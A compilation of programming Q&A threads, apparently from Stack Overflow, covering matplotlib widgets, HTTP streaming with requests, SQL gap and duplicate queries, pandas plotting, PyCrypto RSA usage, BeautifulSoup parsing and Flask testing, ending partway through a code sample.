I have two CheckButtons widgets with 3 elements each. I'd like to read the status of both widgets when either one of the CheckButtons is selected, and then update the chart accordingly.
The slider widget has a `.val` for returning the status of a slider, but the CheckButtons widget seems a bit more awkward (or am I missing something obvious)?
short example:
```
import matplotlib.pyplot as plt
from matplotlib.widgets import CheckButtons
class Example:
def updateChart(self, event):
        colour = self.colours.labels # gets labels as text objects; is there an easy way of getting the status?
print colour
# measurement = measurements.something
def __init__(self):
colourax = plt.axes([0.5, 0.4, 0.09, 0.2])
measurementax = plt.axes([0.5, 0.6, 0.09, 0.2])
self.colours = CheckButtons(colourax, ('Red', 'Green', 'Blue'), (False, False, False))
self.measurements = CheckButtons(measurementax, ('1', '2', '3'), (False, False, False))
self.colours.on_clicked(self.updateChart)
self.measurements.on_clicked(self.updateChart)
def run(self):
plt.show()
ex = Example()
ex.run()
``` | There might perhaps be a more elegant way but you can always keep track of the states of each of the checkboxes yourself, e.g. in a `dict`. The function that you specify using `on_clicked()` will receive the label string of the active checkbox as its second argument, which you can then use to update the status appropriately:
```
import matplotlib.pyplot as plt
from matplotlib.widgets import CheckButtons
class Example:
def onColor(self,label):
self.cstates[label] = not self.cstates[label]
print 'un'*(not self.cstates[label]) + 'checked %s' %label
self.updateChart()
def onMeasurement(self,label):
self.mstates[label] = not self.mstates[label]
print 'un'*(not self.mstates[label]) + 'checked %s' %label
self.updateChart()
def updateChart(self, event=None):
"""do something here using self.cstates and self.mstates?"""
pass
def __init__(self):
colourax = plt.axes([0.5, 0.4, 0.09, 0.2])
measurementax = plt.axes([0.5, 0.6, 0.09, 0.2])
clabels, cvals = ('Red', 'Green', 'Blue'), (False,)*3
mlabels, mvals = ('1', '2', '3'), (False,)*3
self.cstates = dict(zip(clabels,cvals))
self.mstates = dict(zip(mlabels,mvals))
self.colours = CheckButtons(colourax, clabels, cvals)
self.colours.on_clicked(self.onColor)
self.measurements = CheckButtons(measurementax, mlabels, mvals)
self.measurements.on_clicked(self.onMeasurement)
def run(self):
plt.show()
ex = Example()
ex.run()
```
Not the prettiest, but it works! | I know it's a bit awkward, but you can check for visibility of on of the cross lines in check boxes.
```
import matplotlib.pyplot as plt
from matplotlib.widgets import CheckButtons
colourax = plt.axes([0.5, 0.4, 0.09, 0.2])
colours = CheckButtons(colourax, ('Red', 'Green', 'Blue'), (False, False, False))
isRedChecked = colours.lines[0][0].get_visible()
isGreenChecked = colours.lines[1][0].get_visible()
isBlueChecked = colours.lines[2][0].get_visible()
``` | Retrieving the selected values from a CheckButtons object in matplotlib | [
"",
"python",
"matplotlib",
""
] |
I'm struggling to access a streaming API using Python and Requests.
What the API says: "We’ve enabled a streaming endpoint to for requesting both quote and trade data utilizing a persistent HTTP socket connection. Streaming data from the API consists of making an Authenticated HTTP request and leaving the HTTP socket open to continually receive data."
How I've been trying to access the data:
```
s = requests.Session()
def streaming(symbols):
url = 'https://stream.tradeking.com/v1/market/quotes.json'
payload = {'symbols': ','.join(symbols)}
return s.get(url, params=payload, stream=True)
r = streaming(['AAPL', 'GOOG'])
```
The Requests docs [here](https://requests.readthedocs.io/en/latest/user/advanced/) show two things of interest: Use a generator/iterator for use with chunked data, passed in the data field. For streaming data, it suggests using code such as:
```
for line in r.iter_lines():
print(line)
```
Neither seems to work, although I've no idea what to put in the generator function, since the example is unclear. Using r.iter_lines(), I get the output: "b'{"status":"connected"}{"status":disconnected"}'"
I can access the headers, and the response is HTTP 200, but can't get valid data, or find clear examples on how to access streaming HTTP data in python. Any help would be appreciated. The API recommends using Jetty for Java to keep the stream open, but I'm not sure how to do this in Python.
Headers: {'connection': 'keep-alive', 'content-type': 'application/json', 'x-powered-by': 'Express', 'transfer-encoding': 'chunked'} | Not sure if you figured this out, but TradeKing doesn't put newlines in between their JSON blobs. You thus have to use iter\_content to get it byte by byte, append that byte to a buffer, try to decode the buffer, on success clear the buffer and yield the resultant object. :( | As verbsintransit has stated, you need to solve your authentication problems, your streaming problems however can be fixed by using this example:
```
s = requests.Session()
def streaming(symbols):
payload = {'symbols': ','.join(symbols)}
headers = {'connection': 'keep-alive', 'content-type': 'application/json', 'x-powered-by': 'Express', 'transfer-encoding': 'chunked'}
req = requests.Request("GET",'https://stream.tradeking.com/v1/market/quotes.json',
headers=headers,
params=payload).prepare()
resp = s.send(req, stream=True)
for line in resp.iter_lines():
if line:
yield line
def read_stream():
for line in streaming(['AAPL', 'GOOG']):
print line
read_stream()
```
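If the server really does send JSON objects with no newline delimiters between them (as the other answer notes), `iter_lines()` cannot split them; a buffered decoder over `iter_content()` is one sketch of a workaround (`iter_json_objects` is a hypothetical helper, shown here driven by any iterable of byte chunks):

```python
import json

def iter_json_objects(chunks):
    # Accumulate bytes until the buffer holds at least one complete
    # JSON object, then yield it and keep the remainder.
    decoder = json.JSONDecoder()
    buf = ""
    for chunk in chunks:
        buf += chunk.decode("utf-8")
        while buf:
            try:
                obj, end = decoder.raw_decode(buf)
            except ValueError:
                break  # object still incomplete; wait for more data
            yield obj
            buf = buf[end:].lstrip()

# With requests this would be fed by resp.iter_content(chunk_size=1).
stream = [b'{"status":"conn', b'ected"}{"status":', b'"disconnected"}']
for obj in iter_json_objects(stream):
    print(obj)
```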
The `if line:` condition is checking if the `line` is an actual message or just a connection keep-alive. | Understanding Python HTTP streaming | [
"",
"python",
"http",
"streaming",
"python-requests",
"chunked-encoding",
""
] |
[This question](https://stackoverflow.com/questions/1312101/how-to-find-a-gap-in-running-counter-with-sql) explains how to find the first "unused" number in a table, but how can I do the same while defining extra constraints? How do I alter the query so that I get the first unused number that's greater than 100?
e.g. If I have 23, 56, 100, 101, 103 in my table I should get 102. | In MySQL and PostgreSQL:
```
SELECT id + 1
FROM test mo
WHERE NOT EXISTS
(
SELECT NULL
FROM test mi
WHERE mi.id = mo.id + 1
        ) and mo.id > 100
ORDER BY
id
LIMIT 1
```
[fiddle for mysql](http://www.sqlfiddle.com/#!2/43771/6) and [fiddle for postgresql](http://www.sqlfiddle.com/#!1/43771/1)
In MS SQL Server:
```
SELECT TOP 1
id + 1
FROM test mo
WHERE NOT EXISTS
(
SELECT NULL
FROM test mi
WHERE mi.id = mo.id + 1
)
and mo.id > 100
ORDER BY
id
```
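The MySQL/PostgreSQL form above also runs unchanged in SQLite (which the question is tagged with), so it can be sanity-checked locally in a few lines (illustrative Python, not part of the answer):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE test (id INTEGER)")
conn.executemany("INSERT INTO test (id) VALUES (?)",
                 [(23,), (56,), (100,), (101,), (103,)])

gap = conn.execute("""
    SELECT id + 1
    FROM test mo
    WHERE NOT EXISTS
          (SELECT NULL FROM test mi WHERE mi.id = mo.id + 1)
      AND mo.id > 100
    ORDER BY id
    LIMIT 1
""").fetchone()[0]
print(gap)  # -> 102
```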
[fiddle](http://www.sqlfiddle.com/#!3/43771/1) | In Oracle SQL, you may try:
```
SELECT id
FROM
(SELECT ID, lead(ID) OVER(ORDER BY ID) next_val FROM my_table t
)
WHERE id + 1 <> next_val
AND id > 100;
``` | How to find a gap in range in SQL | [
"",
"sql",
"sqlite",
"postgresql",
"gaps-and-islands",
""
] |
I have a pandas dataframe and would like to plot values from one column versus the values from another column. Fortunately, there is `plot` method associated with the dataframes that seems to do what I need:
```
df.plot(x='col_name_1', y='col_name_2')
```
Unfortunately, it looks like among the plot styles (listed [here](http://pandas.pydata.org/pandas-docs/dev/generated/pandas.DataFrame.plot.html) after the `kind` parameter), points are not an option. I can use lines or bars or even density, but not points. Is there a workaround that can help solve this problem? | You can specify the `style` of the plotted line when calling [`df.plot`](http://pandas.pydata.org/pandas-docs/version/0.15.0/generated/pandas.DataFrame.plot.html?highlight=plot#pandas-dataframe-plot):
```
df.plot(x='col_name_1', y='col_name_2', style='o')
```
The `style` argument can also be a `dict` or `list`, e.g.:
```
import numpy as np
import pandas as pd
d = {'one' : np.random.rand(10),
'two' : np.random.rand(10)}
df = pd.DataFrame(d)
df.plot(style=['o','rx'])
```
All the accepted style formats are listed in the documentation of [`matplotlib.pyplot.plot`](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.plot).
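Later pandas versions also accept a dedicated scatter kind, which avoids marker-style strings entirely (a sketch; `col_name_1`/`col_name_2` are the question's placeholder names, and the `Agg` backend is used only to keep the example headless):

```python
import matplotlib
matplotlib.use("Agg")  # headless backend for this example
import numpy as np
import pandas as pd

df = pd.DataFrame({"col_name_1": np.random.rand(10),
                   "col_name_2": np.random.rand(10)})
ax = df.plot(kind="scatter", x="col_name_1", y="col_name_2")
print(len(ax.collections))  # the scatter points live in a PathCollection
```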
 | For this (and most plotting) I would not rely on the Pandas wrappers to matplotlib. Instead, just use matplotlib directly:
```
import matplotlib.pyplot as plt
plt.scatter(df['col_name_1'], df['col_name_2'])
plt.show() # Depending on whether you use IPython or interactive mode, etc.
```
and remember that you can access a NumPy array of the column's values with `df.col_name_1.values` for example.
I ran into trouble using this with Pandas default plotting in the case of a column of Timestamp values with millisecond precision. In trying to convert the objects to `datetime64` type, I also discovered a nasty issue: < [Pandas gives incorrect result when asking if Timestamp column values have attr astype](https://stackoverflow.com/questions/26350364/pandas-gives-incorrect-result-when-asking-if-timestamp-column-values-have-attr-a) >. | How to plot two columns of a pandas data frame using points | [
"",
"python",
"pandas",
"dataframe",
"matplotlib",
"scatter-plot",
""
] |
I have a link like this `<a href=abc.asp?xyz=foobar&baz=lookatme´_beautiful.jpg>` , where there is this unusual symbol `´` , which is not even present in a standard English keyboard.
It is the mirror reflection of the symbol that `Ctrl+k` produces in this editor.
So after I ran this code found on stackoverflow:
```
soup = BeautifulSoup.BeautifulSoup("<a href=abc.asp?xyz=foobar&baz=lookatme´_beautiful.jpg>");
for a in soup.findAll('a'):
print a['href']
```
The output is `abc.asp?xyz=foobar&baz=lookatme`, but I want to have `abc.asp?xyz=foobar&baz=lookatme´_beautiful.jpg`. The website that I'm scraping is in a `.br` domain. Some of the writing is in Portuguese, even though the links are in English, but that uncommon symbol may not be a valid English-language symbol. Any thoughts or suggestions?
Edit: I looked at the representation the Python string produced; it was `<a href=abc.asp?xyz=foobar&baz=lookatme\xb4_beautiful.jpg>`
One way around is to produce custom regex , and this snippet is also from stackoverflow:
```
import re
urls = re.findall(r'href=[\'"]?([^\'" >]+)', s)
```
If it is impossible to modify BeautifulSoup's regex, how can I modify the above regex to incorporate the `\xb4` symbol? (`s` here is the string in question.) | Upgrade to the latest version of BeautifulSoup and install `html5lib`, which is a very lenient parser:
```
import requests
from bs4 import BeautifulSoup
html = requests.get('http://www.atlasdermatologico.com.br/listar.asp?acao=indice').text
soup = BeautifulSoup(html, 'html5lib')
for a in soup.find_all('a'):
href = a.get('href')
if '\\' in repr(href):
print(repr(href))
```
It correctly prints out the links with `\xb4` in the URL. | You can include **[\u0000-\uFFFF]** as a subrange in the re pattern, or only include `\xb4` as **[\u00b4]**. | Parsing uncommon symbol using BeautifulSoup | [
"",
"python",
"regex",
"beautifulsoup",
""
] |
Say that I have 2 tables, one with entries for films that a user likes and another with events that a user has gone to. Each table has a column identifying the user. Something like:
Table Films:
```
id | iduser | film | number of watches | note ....
```
Table events:
```
id | iduser | event | date | ....
```
Both `iduser` columns are connected with a relation to a table with other information about the user.
If I want to select some columns from table films and others from table events with the same `iduser`, is there a better way than 2 SELECTs? I ask this because each SELECT has a different number of rows, so UNION gives me an error and a join gives me something like:
**EDIT**
```
FILM | NOTE | EVENT | DATE
-----------------------------------------
tlor | 9 | going to park | 20/7/12
tlor | 9 | eat a sandwich | 5/9/10
B film | 7 | going to park | 20/7/12
B film | 7 | eat a sandwich | 5/9/10
```
**EDIT 2**
I say only a SELECT because I think it is the faster way, but if there's a faster way, please let me know. | If for some reason you need to fetch your data using exactly one SELECT, you can unify your result sets for `UNION ALL` like this:
```
SELECT 'film' type, iduser, film name, watches, note, NULL date
FROM films
WHERE iduser = ?
UNION ALL
SELECT 'event' type, iduser, event name, NULL, NULL, date
FROM events
WHERE iduser = ?
```
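To see the shape of the unified result set, the query can be replayed in SQLite (illustrative Python; table and column names follow the question):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE films  (iduser INT, film  TEXT, watches INT, note INT);
    CREATE TABLE events (iduser INT, event TEXT, date TEXT);
    INSERT INTO films  VALUES (1, 'tlor', 2, 9);
    INSERT INTO events VALUES (1, 'going to park', '20/7/12');
""")

rows = conn.execute("""
    SELECT 'film' AS type, iduser, film AS name, watches, note, NULL AS date
    FROM films WHERE iduser = 1
    UNION ALL
    SELECT 'event', iduser, event, NULL, NULL, date
    FROM events WHERE iduser = 1
""").fetchall()
for row in rows:
    print(row)
```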
Another approach to grab all the data in one go is to pack the column values specific to a particular table with [`GROUP_CONCAT`](http://dev.mysql.com/doc/refman/5.0/en/group-by-functions.html#function_group-concat) into a `details` column and then [`explode`](http://php.net/manual/en/function.explode.php) it in client code:
```
SELECT 'film' type, iduser, film name, GROUP_CONCAT(CONCAT_WS('|', watches, note)) details
FROM films
WHERE iduser = 1
GROUP BY iduser, film
UNION ALL
SELECT 'event' type, iduser, event name, GROUP_CONCAT(CONCAT_WS('|', date))
FROM events
WHERE iduser = 1
GROUP BY iduser, event
```
Here is **[SQLFiddle](http://sqlfiddle.com/#!2/e69c1/5)** demo | Doing two SELECTs is the correct solution here. You're loading two different sets of data.
**IF** the two tables had similar schemas (e.g., same column names and types), you could combine the two using:
```
SELECT * FROM table1 WHERE userid = ? UNION SELECT * FROM table2 WHERE userid = ?
```
However, this **will not** work sensibly with two tables with different schemas. | Is there a better way than using 2 SELECT? | [
"",
"mysql",
"sql",
""
] |
I'm using SQL Server 2008 RD.
I've got the following table, say `myTable`, consisting of a number of columns. `AccID` and `AccName` are the columns in which I'm interested, and neither of them is a primary key. I want to obtain all the records having at least one duplicate (there could be more than 2 rows agreeing on `AccID` and `AccName`).
```
AccID AccName
1 333 SomeName1
2 333 SomeName1
3 444 SomeName2
4 444 SomeName2
5 444 SomeName2
```
How can I do this with SQL? | Try this way:
```
select m1.AccID, m1.AccName
from myTable m1
join ( select AccID,AccName
from myTable
group by AccID,AccName
          having count(1) >= 2
) m2 on m1.AccID = m2.AccID
and m1.AccName = m2.AccName
``` | Use GROUP BY clause and COUNT aggregate function with condition specified by
```
HAVING COUNT(*) > 1
``` | SQL: Find records with matching values on a set of columns | [
"",
"sql",
"sql-server-2008",
""
] |
THIS IS MY TABLE STRUCTURE:
```
Anees 1000.00
Rick 1200.00
John 1100.00
Stephen 1300.00
Maria 1400.00
```
I am trying to find the MAX(salary) and the person's name.
This is the query I use:
SELECT MAX(salary), emp_name
FROM emp1
I get `1400.00 and Anees.`
While the 1400 is correct, the Anees is wrong; it should be Maria. What changes do I need to make? | Gordon gave an explanation why, and the simplest way to get what you want. But if you for some reason want to use `MAX()`, you can do it like this:
```
SELECT emp_name, salary
FROM emp1
WHERE salary =
(
SELECT MAX(salary) salary
FROM emp1
)
```
Output:
```
| EMP_NAME | SALARY |
---------------------
| Maria | 1400 |
```
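The subquery version can be verified locally with SQLite in a few lines (illustrative Python; same sample data as the question):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE emp1 (emp_name TEXT, salary REAL)")
conn.executemany("INSERT INTO emp1 VALUES (?, ?)",
                 [("Anees", 1000), ("Rick", 1200), ("John", 1100),
                  ("Stephen", 1300), ("Maria", 1400)])

row = conn.execute("""
    SELECT emp_name, salary
    FROM emp1
    WHERE salary = (SELECT MAX(salary) FROM emp1)
""").fetchone()
print(row)  # -> ('Maria', 1400.0)
```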
Here is **[SQLFiddle](http://sqlfiddle.com/#!2/7f5e4/3)** demo | MySQL allows you to have columns in the `select` statement that are not in aggregate functions and are not in the `group by` clause. Arbitrary values are returned.
The easiest way to do what you want is:
```
select t.*
from t
order by salary desc
limit 1;
``` | SQL max() function returns wrong value for row with maximum value | [
"",
"mysql",
"sql",
"max",
""
] |
I am trying to encrypt an integer using RSA.
I observed that I can encrypt a string but cannot encrypt an integer.
Here are the relevant code snippets:
Could not encrypt the integer, 4:
```
crypto:~$ python
Python 2.7.3 (default, Aug 1 2012, 05:14:39)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from Crypto.PublicKey import RSA
>>> input=4
>>> rsa=RSA.generate(1024)
>>> print rsa.encrypt(input,"")[0].encode('hex')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python2.7/dist-packages/Crypto/PublicKey/pubkey.py", line 64, in encrypt
ciphertext=self._encrypt(plaintext, K)
File "/usr/lib/python2.7/dist-packages/Crypto/PublicKey/RSA.py", line 71, in _encrypt
return (self.key._encrypt(c),)
TypeError: must be long, not int
>>>
```
Now, I represent that number as a hex string, it works:
```
crypto:~$ python
Python 2.7.3 (default, Aug 1 2012, 05:14:39)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from Crypto.PublicKey import RSA
>>> input='\x04'
>>> rsa=RSA.generate(1024)
>>> print rsa.encrypt(input,"")[0].encode('hex')
09f7d33972b0b6b72136f8aef0c8ba4446afad0dcf65337cd8b6c48c3758f5455e19e9c1ecbd058d7f83bcaa1f860b1ea0197d83f91fa958e6c9a2664a7ebee77c41fbfc4d3960e98afc0d94d1af8a230c4d86fce53f4c7ac72ae40a8acb101b40de6d46fe8e3cb7265f253b410a95a255e5fad0d0438d1fc62ad1feb96d331f
```
Using the inspect module, I checked the source code of the encrypt function of the RSA object, and it says it can encrypt either a string or an integer plaintext:
```
crypto:~$ python
Python 2.7.3 (default, Aug 1 2012, 05:14:39)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import inspect
>>> from Crypto.PublicKey import RSA
>>> rsa=RSA.generate(1024)
>>> rsa
<_RSAobj @0x29c1368 n(1024),e,d,p,q,u,private>
>>> print inspect.getsource(rsa.encrypt)
def encrypt(self, plaintext, K):
"""encrypt(plaintext:string|long, K:string|long) : tuple
Encrypt the string or integer plaintext. K is a random
parameter required by some algorithms.
"""
wasString=0
if isinstance(plaintext, types.StringType):
plaintext=bytes_to_long(plaintext) ; wasString=1
if isinstance(K, types.StringType):
K=bytes_to_long(K)
ciphertext=self._encrypt(plaintext, K)
if wasString: return tuple(map(long_to_bytes, ciphertext))
else: return ciphertext
```
So, why is it that when I try to encrypt a number using the RSA object, it gives an error?
Why does it expect the input to be in long format and not int? | The traceback clearly tells that `rsa.encrypt` wants an argument of long type. If it is a string, it will turn it into a long.
```
rsa.encrypt(4L,"")
```
This will work and the `4L` is still a number but it is of type long.
I think the reason it asks for a long is that, to perform an encryption, you have to apply padding and then operate on the padded number. That number is very large (hundreds of bits for these key sizes), so a plain int cannot satisfy the need, and a long is required. And as you can see from your inspect result, it only does a type conversion for strings, not for ints. So if you pass an int, it is wrong; short of hacking the source code of the module, you have to pass a long (or a string).
For a long, it returns a long. Maybe you can use this to do the encoding:
```
hex(rsa.encrypt(4L, '')[0]).rstrip('L').lstrip('0x')
'31bf11047cbe9115541e29acb5046d98f2a9bdc44d4768668e9119f8eca24bf24dfc4ac070950734e819675f93e1809859b750df63e8bc71afc7c83edfc6d2f59f495c8e378e0633f07e21672a7e862cfa77a6aede48075dec0cd2b1d8c016dade779f1ea8bd9ffa8ef314c4e391b0f5860cf06cb0f991d2875c49722e98b94f'
```
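What the string path does internally is a bytes-to-long conversion. Here is a pure-Python sketch of that round trip; the helper names mirror PyCrypto's `Crypto.Util.number`, but these implementations are illustrative (and written for Python 3, where iterating over bytes yields ints):

```python
def bytes_to_long(data):
    # Fold the bytes into one big integer, most significant byte first.
    n = 0
    for ch in data:
        n = (n << 8) | ch
    return n

def long_to_bytes(n):
    # Peel the integer back into bytes, least significant byte first,
    # then reverse to restore big-endian order.
    out = bytearray()
    while n > 0:
        out.append(n & 0xFF)
        n >>= 8
    return bytes(reversed(out)) or b"\x00"

print(bytes_to_long(b"\x04"))  # -> 4
print(long_to_bytes(1025))     # -> b'\x04\x01'
```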
You can also change the integer to bytes: `rsa.encrypt(input, '')[0].encode('hex')`, where the input is `struct.pack('b', 4)`. | Python 2.x has two types of integers:
* The `int` type, which matches the C type `long` on the local platform. The precision is limited, but it is at least 32 bits.
* The `long` type, which has infinite precision.
The `encrypt` and `decrypt` methods of the RSA key object in PyCrypto only work with `long` or binary strings, not with `int`. That is documented in [PyCrypto's API](https://www.dlitz.net/software/pycrypto/api/current/Crypto.PublicKey.RSA._RSAobj-class.html).
In theory, you could fix your code by forcing the integers to the required type using the function `long()`, but it is worth pointing out that your code will not be secure.
RSA encryption should be done with [OAEP padding](https://www.dlitz.net/software/pycrypto/api/current/Crypto.Cipher.PKCS1_OAEP-module.html) and byte strings as input/ouput. | Python RSA encrypt integers | [
"",
"python",
"rsa",
"pycrypto",
""
] |
I want to profile Python code on Windows 7. I would like to use something a little more user-friendly than the raw dump of cProfile. In that search I found the GUI RunSnakeRun, but I cannot find a way to download RunSnakeRun on Windows. Is it possible to use RunSnakeRun on Windows, or what other tools could I use?
**Edit:** I have installed RunSnakeRun now. That's progress, thanks guys. How do you run it without a Linux command line?
**Edit 2:** I am using this tutorial <http://sullivanmatas.wordpress.com/2013/02/03/profiling-python-scripts-with-runsnakerun/> but I get stuck at the last line with "python: can't open file 'runsnake.py': [Errno 2] No such file or directory" | The standard solution is to use cProfile (which is in the standard library) and then open the profiles in RunSnakeRun:
<http://www.vrplumber.com/programming/runsnakerun/>
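Producing a stats file that RunSnakeRun (or any `pstats` viewer) can open takes only a few lines (a sketch; `profile.out` is an arbitrary filename and `work` is a stand-in workload):

```python
import cProfile
import os
import pstats
import tempfile

def work():
    return sum(i * i for i in range(10000))

prof = cProfile.Profile()
prof.enable()
work()
prof.disable()

path = os.path.join(tempfile.gettempdir(), "profile.out")
prof.dump_stats(path)  # open this file in RunSnakeRun

stats = pstats.Stats(path)
stats.sort_stats("cumulative").print_stats(5)
```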
cProfile, however, only profiles at the per-function level. If you want line-by-line profiling, try line_profiler:
<https://github.com/rkern/line_profiler> | I installed runsnake following these [installation instructions](http://www.vrplumber.com/programming/runsnakerun/).
The step `python runsnake.py profile.pfl` failed because the installation step (`easy_install SquareMap RunSnakeRun`) did not create a file `runsnake.py`.
For me (on Ubuntu), the installation step created an executable at `/usr/local/bin/runsnake`. I figured this out by reading the console output from the installation step. It may be in a different place on Windows, but it should be printed in the output of `easy_install`. To read a profile file, I can execute `/usr/local/bin/runsnake profile.pfl`. | What tools should I use to profile Python code on window 7 | [
"",
"python",
"windows",
"python-2.7",
"profiling",
"cprofile",
""
] |
I want to make a script which will type string letters one by one
```
def autotype(info):
    count = len(info) # Counting the number of letters in the string
splitlist = list(info)
    i = int(count) # getting an error on this line! it accepts i=int(0) but my loop doesn't work because of this
while i>0:
sys.stdout.write(splitlist[i])
time.sleep(0.2)
i -= 1
info = str("hello world")
autotype(info)
```
the error is: list index out of range
How do I fix it? | The length of a list is the number of elements in the list. But lists start at index `0`, and so they end at index `length - 1`. So, to fix your code as is, it should be `i = count - 1`. (You don't need to cast it to an `int`; it's already one.)
Better yet, rather than iterating using a counter in a `while` loop, just use a `for` loop. You can use the `for` loop to iterate over the characters in a string.
```
for ch in info:
sys.stdout.write(ch)
sys.stdout.flush() # as mawimawi suggests, if you don't do this, it will
# actually just come out all on one line at once.
time.sleep(0.2)
```
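Putting the loop into a complete, runnable version (a sketch; the `delay` and `out` parameters are additions for flexibility and testing):

```python
import sys
import time

def autotype(info, delay=0.2, out=sys.stdout):
    """Type `info` one character at a time (delay/out are added knobs)."""
    for ch in info:
        out.write(ch)
        out.flush()  # without the flush, the text appears all at once
        time.sleep(delay)
    out.write("\n")

autotype("hello world", delay=0.01)
```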
You also don't need to cast `"hello world"` to a string - it's already one. | Your script is quite un-pythonic. Here is something that would do the same. Strings are iterables, so:
```
def autotype(info):
for x in info:
sys.stdout.write(x)
        sys.stdout.flush() # you need this, because otherwise it's buffered!
time.sleep(0.2)
```
That's all you need. | Iterating over a string in Python | [
"",
"python",
""
] |
I am trying to iterate over an array twice to get pairs of elements (e_i, e_j), but I only want the pairs such that i < j.
Basically, what I want would look like this is C-like languages.
```
int my_array[N] = ...;
for (int i=0; i<N; i++)
for (int j=i+1; j<N; j++)
something(my_array[i],my_array[j]);
```
I didn't find what I was looking for in [itertools](https://docs.python.org/library/itertools.html) (the closest thing I've found was `itertools.product(*iterables[, repeat])`).
I tried a few things, but I am not really convinced by any of them:
```
my_list=range(10)
# Using enumerate and slices - explicit loop
res=[]
for i,j in enumerate(my_list):
for k in my_list[i+1:]:
res.append((j,k))
print res
# Using enumerate and slices - list comprehension
res=[(j,k) for i,j in enumerate(my_list) for k in my_list[i+1:]]
print res
# Using enumerate and xrange - explicit loop
res=[]
for i,j in enumerate(my_list):
for k in range(i+1, len(my_list)):
res.append((j,my_list[k]))
print res
# Using enumerate and xrange - list comprehension
res=[(j,my_list[k]) for i,j in enumerate(my_list) for k in range(i+1, len(my_list))]
print res
```
I'm still convinced that there is a better and more pythonic solution. Any suggestion is welcome. | Just use `itertools.combinations(my_list, 2)`. | Can't you just use the `range` function and go with:
```
vect = [...]
for i in range(0, len(vect)):
for j in range(i+1, len(vect)):
do_something()
``` | Iterate over array twice (cartesian product) but consider only half the elements | [
"",
"python",
"iterator",
"combinations",
"python-itertools",
""
] |
I am using MS SQL Server 2008. I need to compare the newly entered start time and end time of an event with the existing event timings. In the database I need to check the new start time and end time values; the time period should not overlap with the existing / already booked event timings.
I need to check this condition in the database stored procedure; only if the condition is satisfied should the event be accepted. The best example is conference hall booking. | ```
SELECT @count = COUNT (EventID) FROM TblEvent WHERE (('@STARTTIME' BETWEEN StartTime AND EndTime) or ('@ENDTIME' BETWEEN StartTime AND EndTime));
IF @count = 0
Begin
Select @count = COUNT (EventID) FROM TblEvent WHERE (('@STARTTIME' < StartTime and '@ENDTIME' > EndTime));
END
IF @count > 0
BEGIN
SELECT 'An event already exists at that point in time; please select another time' AS 'MESSAGE';
END
Else
BEGIN
-- Add query to save the event in the DB
SELECT 'Event is Added' AS 'MESSAGE';
END
```
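The two checks combined are equivalent to the classic interval-overlap predicate `(StartA <= EndB) AND (EndA >= StartB)`; here is a brute-force check of that equivalence (illustrative Python, not part of the stored procedure):

```python
def two_step(new_s, new_e, s, e):
    # Mirrors the procedure: either endpoint of the new event falls
    # inside the existing one, or the new event fully contains it.
    first = (s <= new_s <= e) or (s <= new_e <= e)
    second = (new_s < s) and (new_e > e)
    return first or second

def overlap(new_s, new_e, s, e):
    # The classic one-line interval-overlap test.
    return new_s <= e and new_e >= s

# Exhaustively compare the two over all small integer intervals.
for a in range(5):
    for b in range(a, 5):
        for c in range(5):
            for d in range(c, 5):
                assert two_step(a, b, c, d) == overlap(a, b, c, d)
print("equivalent")
```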
NOTE:
@STARTTIME = USER ENTERED START TIME,
@ENDTIME = USER ENTERED END TIME | The answer is `(StartA <= EndB) and (EndA >= StartB)`. Please read this: [Determine Whether Two Date Ranges Overlap](https://stackoverflow.com/questions/325933/determine-whether-two-date-ranges-overlap) | How to compare Starting time and End time of an event with existing events of same time on same day? | [
"",
"asp.net",
"sql",
"sql-server-2008",
""
] |
I have a function that takes in a list of class instances (but sometimes it could just be a single, non-list class instance), and I want to print it out regardless of whether it is a list or not. I know you can do it by doing something like this:
```
def func(obj):
if type(obj) == list:
for o in obj:
print o
else:
print obj
```
Is there a fast, better way to do this, or is this the cleanest way? | My initial thought, using the simplest Python code, would be:
```
def func(obj):
if not isinstance(obj,list):
obj = [obj]
for o in obj:
print o
``` | ```
def func(obj):
return map(some_function,obj) if isinstance(obj,(list,tuple)) else some_function(obj)
```
maybe? for some definition of better | Printing out a list of unknown size in a function in python | [
"",
"python",
""
] |
Suppose I have a dictionary:
```
D1 = {'A1' : [2, 3], 'B1': [3, 3], 'C1' : [4, 5]}
```
and I want to remove all the `3`s from `D1` so that I would get:
```
D1 = {'A1' : [2], 'B1': [], 'C1' : [4, 5]}
``` | Something like this works, assuming 3 always appears in the value, not in the key:
```
>>> for v in D1.values():
... if 3 in v:
... v.remove(3)
...
>>> D1
{'A1': [2], 'C1': [4, 5], 'B1': [3]}
```
EDIT: I just realized there can be multiple occurrences; try this one:
```
>>> D1 = {'A1' : [2, 3], 'B1': [3, 3], 'C1' : [4, 5]}
>>> for k, v in D1.items():
... D1[k] = filter(lambda x: x!=3, v)
...
>>> D1
{'A1': [2], 'C1': [4, 5], 'B1': []}
``` | Here's a one-liner:
```
threeless = {k: [e for e in v if e != 3] for k, v in D1.iteritems()}
``` | How to remove a value but keep the corresponding key in a dictionary? | [
"",
"python",
""
] |
I have a working web application on Flask with SqlAlchemy for moderation of news, it has some api methods to handle moderation requests, such as approve, deny currently selected news, list them, etc.
I want to write unit tests to this methods, and I made them work, but I don't understand how to implement executing all requests which I do from test cases in one db session, so that I could remove all changes to database. Or is there another cleaner or proper way to do this?
I've found out that maybe all I need is `scoped_session` in SQLAlchemy, but all my attempts to implement it have failed. If that's the correct way, please tell me where to use these lines of code (in settings, or in the test case `setUp` method).
```
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import sessionmaker
session_factory = sessionmaker()
Session = scoped_session(session_factory)
``` | I suggest you use the [Flask-Testing](http://pythonhosted.org/Flask-Testing/) extension. This is an approved extension which lets you do the unit testing as you desire. It has a specific section for SQLAlchemy as well.
**Testing with SQLAlchemy**
This covers a couple of points if you are using Flask-Testing with SQLAlchemy. It is assumed that you are using the Flask-SQLAlchemy extension, but if not the examples should not be too difficult to adapt to your own particular setup.
First, **ensure you set the database URI to something other than your production database**! Second, it's usually a good idea to create and drop your tables with each test run, to ensure clean tests:
```
from flask_testing import TestCase
from myapp import create_app, db
class MyTest(TestCase):
